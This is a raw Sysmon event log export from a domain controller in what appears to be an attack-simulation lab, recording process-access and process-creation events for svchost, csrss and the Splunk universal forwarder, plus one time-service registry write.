10341000x80000000000000008167Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:04.797{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008166Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:04.797{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008165Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:04.797{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008164Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:04.797{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008163Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:04.797{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008162Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:04.797{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008161Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:04.797{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008160Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:04.797{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-866C-5FCF-6601-000000009101}3368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008159Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:04.797{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-866C-5FCF-6601-000000009101}3368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008158Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:04.798{10ACEC4A-866C-5FCF-6601-000000009101}3368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000008186Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:58:05.891{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6cd6a-0x27058f6d) 10341000x80000000000000008185Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:05.671{10ACEC4A-866D-5FCF-6701-000000009101}24122756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008184Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:05.547{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-866D-5FCF-6701-000000009101}2412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008183Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:05.547{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008182Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:05.547{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008181Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:05.547{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008180Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:05.547{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008179Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:05.547{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008178Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:05.547{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008177Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:05.547{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008176Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:05.547{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008175Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:05.547{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008174Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:05.547{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-866D-5FCF-6701-000000009101}2412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008173Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:05.547{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-866D-5FCF-6701-000000009101}2412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008172Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:05.548{10ACEC4A-866D-5FCF-6701-000000009101}2412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008200Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:06.391{10ACEC4A-866E-5FCF-6801-000000009101}29042888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008199Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:06.250{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-866E-5FCF-6801-000000009101}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008198Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:06.250{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\W